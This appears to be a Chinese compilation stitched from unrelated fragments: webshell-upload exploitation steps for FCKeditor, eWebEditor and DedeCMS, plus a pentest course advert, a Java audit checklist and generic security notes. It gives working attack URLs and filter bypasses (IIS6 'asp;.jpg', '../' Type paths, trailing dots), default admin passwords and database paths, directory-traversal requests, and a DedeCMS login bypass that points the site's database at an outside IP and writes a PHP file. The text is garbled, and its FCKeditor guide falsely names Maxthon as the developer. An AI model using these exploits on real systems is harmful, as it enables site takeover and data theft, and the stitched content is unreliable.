FCKeditor漏洞
- 格式:doc
- 大小:47.00 KB
- 文档页数:9
FCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6 [Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言FCKeditor被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述:FCKeditor v2.4.3中File类别默认拒绝上传类型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtmFckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件上传后 它保存的文件直接用的¥sFilePath = ¥sServerDir . ¥sFileName,而没有使用¥sExtension为后缀直接导致在win下在上传文件后面加个.来突破[未测试]而在apache下,因为"Apache文件名解析缺陷漏洞"也可以利用之,详见"附录A"另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘。
DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞入侵步骤如下:/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd =inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POS T[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r 0t0&_POST[GLOBALS][cfg_dbname]=root把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。
小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。
下面给出官方的解决办法:解决办法:找到include/common.inc.php文件,把foreach($_REQUEST as $_k=>$_v){var_dump($_k);if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ): {exit('Request var not allow!');}}换成//检查和注册外部提交的变量function CheckRequest(&$val) {if (is_array($val)) {foreach ($val as $_k=>$_v) {CheckRequest($_k);CheckRequest($val[$_k]);}} else{if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) ){exit('Request var not allow!');}}}CheckRequest($_REQUEST);网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');再用下面表单提交,shell 就在同目录下1.php。
培训方案
1、对学生知识的要求
对Windows、Linux及SQL语句有一定的了解即可
2、学生的知识能力提高
本课程重点培训学生的Web渗透测试能力,通过20天的渗透测试培训,学生可具备以下能力
1)、了解Web服务器的工作过程及原理
2)、了解HTTP协议
3)、学会渗透测试前踩点技能
4)、学会使用常见的渗透测试工具如burpsuite、SQLmap等等
5)、了解常见的系统攻击过程及手段
6)、学会常见的系统攻击方法
7)、学会Web服务器的信息获取
8)、学会IIS、Apache、tomcat、Weblogic等常见中间件的漏洞利用方式及加固方法9)、深入了解各类SQL注入漏洞的原理、攻击手段及加固措施
10)、掌握上传漏洞、命令执行漏洞、XSS漏洞等常见Web漏洞的利用方式及技巧11)、掌握各类提权方法
12)、掌握各类第三方插件/程度的漏洞利用方法
3、考试及颁发证书
暂无,可有
4、培训案例分析
安云科技针对学生每年举办两次定期培训,现已经举办了4次针对学生的培训,同时,受邀给青岛工学院、济南职业技术学院、山东警察学院等学校的老师进行培训
关于提升就业问题:现阶段,国家对信息安全的重视及网络安全行业的火爆,但人才短缺,安全行业的薪资也普遍高于其它行业,据调查,目前山东省内所有安全公司都面临人员不足的情况
5、培训课程。
FCKeditor使用方法详解目录一、FCKeditor简介 (2)1.1 FCKeditor是什么 (2)1.2 FCKeditor的特点 (3)二、安装与配置FCKeditor (5)三、基本功能使用方法 (6)3.1 文本格式化 (7)3.2 段落和列表操作 (9)3.3 图片和表格插入 (10)3.4 表单字段 (11)3.5 样式和脚本 (12)四、高级功能使用方法 (13)4.1 可视编辑器 (14)4.2 自动排版 (16)4.3 批量导入/导出 (17)4.4 国际化支持 (18)4.5 客户端存储 (20)五、自定义插件与扩展 (21)5.1 如何安装插件 (22)5.2 插件的使用方法 (24)5.3 开发自定义插件 (25)六、常见问题与解决方案 (27)6.1 常见问题列表 (28)6.2 问题解决步骤 (29)七、实例演示 (30)7.1 创建一个简单的HTML页面 (31)7.2 在页面中添加FCKeditor (32)7.3 配置和使用FCKeditor的各种功能 (34)八、FCKeditor在主流开发框架中的应用 (35)8.1 PHP+MySQL环境下的应用 (36)8.2 环境下的应用 (37)8.3 Java/Spring环境下的应用 (39)九、总结与展望 (39)9.1 FCKeditor的优点 (40)9.2 FCKeditor的局限性与未来发展趋势 (41)一、FCKeditor简介FCKeditor是一款由德国Maxthon公司开发的强大的网页文本编辑器,它具有丰富的功能、高度的可定制性和易用性,被广泛应用于各种Web应用中,如论坛、博客、新闻发布等。
FCKeditor不仅提供了基本的文本编辑功能,还支持图像、表格、超链接等元素的插入和编辑,以及自定义插件和宏,可以满足用户的各种编辑需求。
FCKeditor采用了基于JavaScript的富文本编辑技术,具有高效的性能和较小的体积,可以轻松地集成到各种Web应用中。
解析⽂件上传漏洞从FCKEditor⽂件上传漏洞谈起⽂件上传漏洞就是允许⽤户上传任意⽂件可能会让攻击者注⼊危险内容或恶意代码,并在服务器上运⾏,下⾯⼩编就为⼤家具体的讲解⽂件上传漏洞的知识,希望可以帮助到⼤家。
⽂件上传后导致的常见安全问题⼀般有:1)上传⽂件是Web脚本语⾔,服务器的Web容器解释并执⾏了⽤户上传的脚本,导致代码执⾏。
2)上传⽂件是Flash的策略⽂件crossdomain.xml,⿊客⽤以控制Flash在该域下的⾏为(其他通过类似⽅式控制策略⽂件的情况类似);3)上传⽂件是病毒、⽊马⽂件,⿊客⽤以诱骗⽤户或者管理员下载执⾏。
4)上传⽂件是钓鱼图⽚或为包含了脚本的图⽚,在某些版本的浏览器中会被作为脚本执⾏,被⽤于钓鱼和欺诈。
除此之外,还有⼀些不常见的利⽤⽅法,⽐如将上传⽂件作为⼀个⼊⼝,溢出服务器的后台处理程序,如图⽚解析模块;或者上传⼀个合法的⽂本⽂件,其内容包含了PHP脚本,再通过"本地⽂件包含漏洞(Local File Include)"执⾏此脚本;等等。
要完成这个攻击,要满⾜以下⼏个条件:⾸先,上传的⽂件能够被Web容器解释执⾏。
所以⽂件上传后所在的⽬录要是Web容器所覆盖到的路径。
其次,⽤户能够从Web上访问这个⽂件。
如果⽂件上传了,但⽤户⽆法通过Web访问,或者⽆法得到Web容器解释这个脚本,那么也不能称之为漏洞。
最后,⽤户上传的⽂件若被安全检查、格式化、图⽚压缩等功能改变了内容,则也可能导致攻击不成功。
⼀、从FCKEditor⽂件上传漏洞谈起FCKEditor是⼀款⾮常流⾏的富⽂本编辑器,为了⽅便⽤户,它带有⼀个⽂件上传功能,但是这个功能却出过多次漏洞。
FCKEditor针对ASP/PHP/JSP等环境都有对应的版本,以PHP为例,其⽂件上传功能在:配合解析漏洞。
(⼀)IIS5.x-6.x解析漏洞使⽤iis5.x-6.x版本的服务器,⼤多为windows server 2003,⽹站⽐较古⽼,开发语句⼀般为asp;该解析漏洞也只能解析asp⽂件,⽽不能解析aspx⽂件。
java代码审计常见漏洞点本⼈还处于代码审计的初级阶段,由于刚开始学代码审计的时候,就感觉⼀团代码,不知道从何下嘴。
先从底层开始审计:底层漏洞:1. 查看该系统所⽤框架:Struts2的相关安全:(1) 低版本的struts2,低版本的Struts2存在很多已知的版本漏洞。
⼀经使⽤,很容易造成⽐较⼤的危害。
(2) 开启 Struts2的动态调⽤⽅法,现在发现的如s2-033 ,s2-032等漏洞,都是由于系统开启了动态调⽤⽅法,导致远程代码执⾏。
(3) 在jsp页⾯中使⽤Struts2的ognl表达式传输数据。
(4) 开启Struts2的devMode,易造成远程代码执⾏(5) 存在Struts2本⾝⾃带的ognl页⾯(6) 使⽤Struts2⾃带的redirect等⽅法Spring的相关安全:Spring在jsp尽量使⽤el表达式,spring的boot框架远程命令执⾏就是由于el表达导致的。
mybatis xml相关安全:在SQL语句中,使⽤$进⾏传参;其他安全:在使⽤java⾃带的环境时,如weblogic或者jboss,请注意查看版本号,因为此类环境低版本,⼤部分包含java反序列化漏洞,导致远程代码执⾏。
2. 查找SQL注⼊:DAO:是否存在拼接的SQL语句如:String sql = "select * from user where id="+id;XML中:是否使⽤$,因为在xml中,#value#此时value是以参数的形式插⼊进去,$value$此时value是以字符串的形式直接插⼊到xml中,易导致sql注⼊;<select id="abdc" resultMap="result">select * from tb_card_bin where card_length = #cardLength# and instr(bin_no, '$cardNoFirstNum$') = 1</select>3.第三⽅控件漏洞如:fckeditor,wordpress等等。
随着用户对客户端便利性的要求,加之服务提供方对减少客户端开辟成本和维护成本的期望,越来越多的应用已经转为 B/S (浏览器/服务器)结构。
由于用户对页面展现效果和易用性的要求越来越高, Web 2.0 技术的应用越来越广泛,这样非但促进了Web 应用的快速发展,同时也使 Web 应用中所存在的安全问题越来越明显的暴露出来。
根据 X-Force 的 2022 年年度报告, Web 安全事件数量增长迅猛:2022 年 Web 安全事件增长在这种背景条件下,除了越来越多的站点因安全问题而被攻击者攻陷,导致重要信息泄漏,甚至成为傀儡主机,大量傀儡主机被攻击者利用发动 DDOS (分布式拒绝服务攻击) 。
客户端也面临着不少安全问题,恶意页面的垃圾信息传播、网页挂马导致的恶意程序的传播等等。
1.1 什么是 Web 安全评估Web 安全评估主要在客户的 Web 平台上,针对目前流行的 Web 安全问题分别从外部和内部进行黑盒和白盒安全评估。
根据 Web 多层面组成的特性,通过对Web 的每一个层面进行评估和综合的关联分析,从而查找 Web 站点中可能存在的安全问题和安全隐患。
1.2 Web 安全评估与传统评估服务的区别与传统的系统层面的评估不同, Web 站点的安全评估更加注重“关联性”。
在传统的系统层评估中,评估方向以系统自身安全性和策略的完善程度作为主要的评估方向,目标仅在于揭露系统配置上的缺陷。
而在 Web 站点评估中,除了需要关注系统层面的安全问题外,还需要关注系统组件及第三方应用程序设计的安全性。
而在 Web 站点中,安全问题也再也不像系统安全问题那样只具备单一的层面,而是多个层面叠加产生,因此 Web 安全评估还需要更加注重各个层面安全问题的关联性,将这些问题进行必要的关联分析后来确认Web 站点整体的风险。
从这方面来说,Web 安全评估从人力到技术等各个方面的投入都要大于传统的系统安全评估,而其所能发掘的问题也是多层面的。
ewebeditor漏洞概述ewebeditor是一款常见的富文本编辑器,广泛应用于网站开发中。
然而,由于其设计和实现的不完善,存在一些漏洞,可能导致恶意攻击者利用这些漏洞进行远程执行任意代码或者进行跨站脚本攻击(XSS)等攻击行为。
漏洞类型根据漏洞的性质和影响范围,ewebeditor漏洞主要可以分为以下几种类型:1.任意文件上传漏洞:攻击者可以通过漏洞上传恶意文件,从而执行任意代码或获取敏感信息。
2.跨站脚本攻击漏洞(XSS):攻击者可以在受影响的网页中注入恶意JavaScript代码,当其他用户浏览该网页时,恶意代码就会执行。
攻击者可以利用XSS漏洞窃取用户登录凭证、劫持用户会话等。
3.信息泄露漏洞:敏感信息(如管理员密码、数据库连接字符串等)通过漏洞暴露给攻击者,导致安全风险。
4.路径遍历漏洞:攻击者可以通过漏洞访问或下载网站上的敏感文件,甚至获取到服务器上的敏感信息。
5.远程代码执行漏洞:攻击者可以通过漏洞执行任意代码,从而完全控制服务器。
漏洞利用方式由于ewebeditor漏洞的公开性,攻击者可以通过多种方式对其进行利用。
以下是一些常见的漏洞利用方式:1.利用未授权访问:攻击者可以通过访问ewebeditor的后台管理接口,使用默认或弱密码登录,从而获取到管理权限。
2.利用文件上传漏洞:攻击者可以通过上传包含恶意代码的文件来执行任意命令或代码。
3.利用XSS漏洞:攻击者可以在受影响的网页中注入恶意JavaScript代码,从而获取到用户的敏感信息或进行其他恶意操作。
4.利用路径遍历漏洞:攻击者可以通过构造恶意请求,访问或下载网站上的敏感文件。
5.利用远程代码执行漏洞:攻击者可以通过漏洞执行任意代码,从而完全控制服务器。
漏洞防御措施为了保护ewebeditor以及网站安全,以下是一些常见的漏洞防御措施:1.及时更新漏洞版本:保持ewebeditor及相关插件的最新版本,及时修复已知漏洞。
前端开发中常见的安全漏洞及防范措施在当今数字化时代,随着互联网的快速发展,前端开发作为构建网页和应用程序的重要环节,扮演着关键的角色。
然而,伴随着技术的进步,也带来了一系列的安全隐患。
本文将探讨前端开发中常见的安全漏洞,并提供相应的防范措施。
一. 跨站脚本攻击(Cross-Site Scripting, XSS)跨站脚本攻击是一种常见而严重的安全漏洞,攻击者通过向前端输入恶意脚本代码,将其植入网页中,当用户访问该网页时,被攻击者的脚本就会在用户的浏览器中执行。
这可能导致用户信息泄露、会话劫持等严重后果。
为了预防XSS攻击,开发人员应该始终对用户输入进行严格的验证和过滤。
可以通过使用特殊字符转义、过滤敏感标签、限制HTML标签的使用等方法来减少攻击的风险。
二. 跨站请求伪造(Cross-Site Request Forgery, CSRF)跨站请求伪造是通过诱使用户点击具有攻击性的链接或图片来伪造用户身份,以用户的名义发送恶意请求,例如修改密码、转账等。
攻击者利用用户在其他受信任网站上的已登录状态来进行攻击,用户通常无法察觉。
为了防止CSRF攻击,开发人员可以使用CSRF令牌机制来验证请求的合法性。
每个用户会话都生成一个唯一的令牌,用于验证用户提交的表单或请求是否是合法的。
此外,开发人员还应设置合适的SameSite Cookie策略,以限制来自其他网站的Cookie访问。
三. 不安全的敏感数据传输在前端开发过程中,往往需要进行敏感数据的传输,例如用户名、密码等。
如果采用不安全的传输方式,例如明文传输,那么这些敏感数据很容易被攻击者截获,造成严重的数据泄露问题。
为了确保敏感数据的安全传输,开发人员应该使用安全的HTTPS协议来加密数据传输。
通过SSL证书、密钥验证等方式,确保数据在传输过程中的机密性和完整性。
四. 未对输入数据进行验证和过滤在前端开发中,用户输入的数据是最容易被攻击者利用的入口之一。
site:editor inurl:asp?id inurl:ewebeditornet比如常见的编辑器漏洞有:ewebeditorewebeditornetfckeditoreditorsouthidceditorSouthidcEditorbigcneditor一:ewebeditor为例1:默认下载下来的后台:/ewebeditor/admin_login.asp后台如果能进入:可点击样式管理:standard 拷贝一份(直接修改改不了)在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览在编辑器里点设计然后直接上传asa大马.上传后在代码里可以看到马的位置!(原理:因为在iis里网站的属性里应用程序配置一项asa扩展名还是用asp.dll来解析的,asp 也是还有cer cdx )在cer cdx asa的被删掉那么马儿就找不到映射不过去.可以在拷贝过后的样式图片类型里加入aaspsp 然后在上传直接就可以上传asp文件2:下载默认数据库/ewebeditor/db/ewebeditor.mdb然后分析数据库webeditor_system(1) 就可以看到用户名和密码如果破解不出来可以在webeditor_style(14 样式表里主要看允许上传文件的扩展名(s-fileext s_ingeext)看到一个小黑客曾经搞过多了asa aaspsp可以用他来利用!(后台找不到的情况下也可以用此方法)可以构造语句:比如ID=46 s-name =standard1构造代码: ewebeditor.asp?id=content&style=standardID和和样式名改过后ewebeditor.asp?id=46&style=standard1然后就是进入编辑器上传asa 或者asp的得到webshell二:ewebeditornet 漏洞利用默认上传地址:/ewebeditornet/upload.aspx可以直接上传一个cer的木马在无法上传的情况下可以地址栏构造以下代码: javascript:lbtnUpload.click();然后查看源代码:找到uploadsave 找到地址默认传到uploadfile这个文件夹里(漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. )三:fckeditor 漏洞利用/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.a sp?Command=FileUpload&Type=Image&CurrentFolder=/就把文件名字段改成NEWfile 选择文件名可定义上传过后在/userfiles/image/找文件四:southidceditor/admin/southidceditor/datas/southidceditor.mdb/admin/southidceditor/popup.asp/admin/southidceditor/admin/admin_login.asp五:bigcneditor这个页不多说了原理都差不多!防范方法很简单就不多讲了,FCKeditor上传漏洞,/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type= all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:/UserFiles/all/1.asa"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.比如输入:/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type= monyer&Connector=connectors/asp/connector.asp所传的文件就到了/UserFiles/monyer/ 下了而如果这样输入:/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.所传的文件就到了网站根目录下了。
FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFolders AndFiles&Type=Image&CurrentFolder=/XML页面中第二行“url=/xxx”的部分就是默认基准上传路径Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言FCKeditor被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述:FCKeditor v2.4.3中File类别默认拒绝上传类型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtmFckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension为后缀直接导致在win下在上传文件后面加个.来突破[未测试]而在apache下,因为"Apache文件名解析缺陷漏洞"也可以利用之,详见"附录A"另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘。
攻击利用:允许其他任何后缀上传Note:[Hell1]原作:/logs/2006/02/1916091.html利用2003路径解析漏洞上传网马影响版本: 附录B脆弱描述:利用2003系统路径解析漏洞的原理,创建类似“bin.asp”如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
攻击利用:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/a sp/connector.aspFCKeditor PHP上传任意文件漏洞影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2脆弱描述:FCKeditor在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。
成功攻击要求config.php配置文件中启用文件上传,而默认是禁用的。
攻击利用: (请修改action字段为指定网址):FCKeditor 《=2.4.2 for php.htmlNote:如想尝试v2.2版漏洞,则修改Type=任意值即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
TYPE自定义变量任意上传文件漏洞影响版本: 较早版本脆弱描述:通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。
攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/as p/connector.asp打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:/UserFiles/all/1.asp"Type=all" 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.比如输入:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp /connector.asp网马就可以传到网站的根目录下.Note:如找不到默认上传文件夹可检查此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFolders AndFiles&Type=Image&CurrentFolder=/FCKeditor 新闻组件遍历目录漏洞影响版本:aspx版FCKeditor,其余版本未测试脆弱描述:如何获得webshell请参考上文“TYPE自定义变量任意上传文件漏洞”攻击利用:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&Curren tFolder=../../..%2F&NewFolderName=aspx.asp根据返回的XML信息可以查看网站所有的目录。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image& CurrentFolder=%2FFCKeditor中webshell的其他上传方式影响版本:非优化/精简版本的FCKeditor脆弱描述:如果存在以下文件,打开后即可上传文件。
攻击利用:fckeditor/editor/filemanager/upload/test.htmlfckeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor 文件上传“.”变“_”下划线的绕过方法影响版本: FCKeditor => 2.4.x脆弱描述:我们上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。
攻击利用:提交1.php+空格就可以绕过去所有的,※不过空格只支持win系统*nix是不支持的[1.php和1.php+空格是2个不同的文件]Note:upload/2010/3/201003102334372778.jpg 这样的格式做了过滤。
也就是IIS6解析漏洞。
上传第一次。
被过滤为123_asp;123.jpg 从而无法运行。
但是第2次上传同名文件123.asp;123.jpg后。
由于”123_asp;123.jpg”已经存在。
文件名被命名为123.asp;123(1).jpg …… 123.asp;123(2).jpg这样的编号方式。
所以。
IIS6的漏洞继续执行了。
如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因:1.FCKeditor没有开启文件上传功能,这项功能在安装FCKeditor时默认是关闭的。
如果想上传文件,FCKeditor会给出错误提示。
2.网站采用了精简版的FCKeditor,精简版的FCKeditor很多功能丢失,包括文件上传功能。
3.FCKeditor的这个漏洞已经被修复。
--------------------------------------------------------------------------------eWebEditoreWebEditor利用基础知识默认后台地址:/ewebeditor/admin_login.asp建议最好检测下admin_style.asp文件是否可以直接访问默认数据库路径:[PATH]/db/ewebeditor.mdb[PATH]/db/db.mdb-- 某些CMS里是这个数据库也可尝试[PATH]/db/%23ewebeditor.mdb -- 某些管理员自作聪明的小伎俩使用默认密码:admin/admin888 或admin/admin 进入后台,也可尝试admin/123456 (有些管理员以及一些CMS,就是这么设置的)点击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。
而后--预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。
2、当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell3、上传后无法执行?目录没权限?帅锅你回去样式管理看你编辑过的那个样式,里面可以自定义上传路径的!!!4、设置好了上传类型,依然上传不了麽?估计是文件代码被改了,可以尝试设定“远程类型”依照6.0版本拿SHELL的方法来做(详情见下文↓),能够设定自动保存远程文件的类型。
5、不能添加工具栏,但设定好了某样式中的文件类型,怎么办?↓这么办!(请修改action字段)Action.htmleWebEditor踩脚印式入侵脆弱描述:当我们下载数据库后查询不到密码MD5的明文时,可以去看看webeditor_style(14)这个样式表,看看是否有前辈入侵过或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的WEBSHELL.攻击利用:比如ID=46s-name =standard1构造代码:ewebeditor.asp?id=content&style=standardID和和样式名改过后ewebeditor.asp?id=46&style=standard1eWebEditor遍历目录漏洞脆弱描述:ewebeditor/admin_uploadfile.aspadmin/upload.asp过滤不严,造成遍历目录漏洞攻击利用:第一种:ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=..再加&dir=../..&dir=/../.. 看到整个网站文件了第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..eWebEditor 5.2 列目录漏洞脆弱描述:ewebeditor/asp/browse.asp过滤不严,造成遍历目录漏洞攻击利用:/ewebeditor/asp/browse.asp?style=standard650&;dir=…././/..利用WebEditor session欺骗漏洞,进入后台脆弱描述:漏洞文件:Admin_Private.asp只判断了session,没有判断cookies和路径的验证问题。